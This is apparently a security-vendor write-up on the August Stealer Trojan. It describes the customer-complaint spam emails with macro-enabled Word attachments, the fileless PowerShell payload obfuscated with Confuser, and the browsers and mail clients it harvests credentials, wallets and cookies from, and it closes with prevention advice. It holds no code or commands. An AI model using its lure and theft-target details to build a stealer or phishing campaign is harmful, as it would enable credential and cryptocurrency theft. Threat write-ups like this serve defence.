August Stealer Revs Up to Steal Credentials, Crypto-Currency and More

There are many different types of malware, and August Stealer belongs to the category that inexperienced users might find extremely difficult to understand. This infection is identified as a Trojan as it uses stealth techniques to slither into targeted systems. Although it is possible that this infection could be used to target random users, research shows that it is usually used to target the support systems of large retailers and manufacturers. That, of course, does not mean that the infection will act the same in every single situation, or that it will not evolve. The identity of the creator of this malware is unknown, but it was found that the macro that is used to drop it onto the targeted system is available on the dark web for a price of 100 USD. Without a doubt, this is not a huge payment, and many malicious parties are likely to jump on the action; especially since there is not much effort that needs to be put in afterward. If the target is tricked into opening the malicious file and enabling macros, data theft begins right away, and the victim might realize that they need to remove August Stealer only after it completes its mission.

How is August Stealer distributed?

The short answer is via emails. Unfortunately, it can be difficult to spot malicious spam emails, especially if they are created in a smart manner. As we mentioned already, the infection is likely to target support systems of larger companies; specifically, retailers. In the examples tested, August Stealer is spread using spam emails that represent messages from alleged customers, which means that retailers cannot ignore them. A few subject lines that have been found to be associated with the infection include “Items vanish from the cart before checkout” or “Need help with order.” The message inside reveals an issue that the alleged customer is having, and the Word Document file attached to the message is meant to provide support with more detailed information. If the target clicks the attachment, they are introduced to a message that asks to Enable Content, and if that is done, the malicious August Stealer is installed silently. If the document is empty or its contents make no sense, this is a red flag indicating that the system must be scanned for malware that might require removal. Of course, our research team recommends that users who face such emails delete them immediately or use precaution when dealing with them.

How does August Stealer work once inside?

As the name of the infection suggests, it was created to steal something, and our research team indicates that it was created to steal all kinds of information, including passwords, bitcoin wallet information, personal files, RDP files, using which unauthorized access to the system could be gained, messenger login data, and even cookies that store sensitive data. To ensure that August Stealer is successful, it is built to obtain information from a variety of different applications. These include Microsoft Outlook, Mozilla Thunderbird, Windows Live, FileZilla, CoreFTP, as well as web browsers. The browsers that can be affected are Amigo, Bromium, Chrome, Chromium, Comodo, CoolNovo, Coowon, Dooble, FireFox, IceDragon, Mail.Ru, Opera, RockMelt, SRWare Iron, Torch, U, Vivaldi, and Yandex. Once August Stealer’s payload is downloaded using PowerShell in a fileless manner, it employs an obfuscation tool called Confuser to ensure that the threat is not detected and deleted before it does its job. If it remains undetected and un-deleted, it quickly starts collecting and transmitting data to a remote server, where malicious parties can unpack it and employ it in various ways. For example, they can use obtained passwords and usernames to hijack personal accounts, as well as steal crypto-currency or assets from online banking accounts.

What should you do to stop August Stealer?

First and foremost, we have to warn that August Stealer is not the only infection of this nature. Vega Stealer is a variant of this threat, and it is just as malicious. The point is that you need to look at the bigger picture here to ensure that your system is protected from all kinds of malware. Deleting August Stealer can be a challenge because, after all, it is a fileless infection, and it uses obfuscation methods to stay hidden. Without a doubt, employing anti-malware software is extremely important in any case, but that cannot protect from all virtual dangers. Needless to say, it is easiest to remove malware that does not even exist. Therefore, retailers, manufacturers, and regular users need to make sure that they are doing everything to prevent it from slithering in altogether. In this situation, staying away from corrupted spam emails is the most important task. Since that is not possible in all situations, tools that would detect and remove malware before it is used in a malicious way must be employed. Using email gateway security tools is strongly recommended.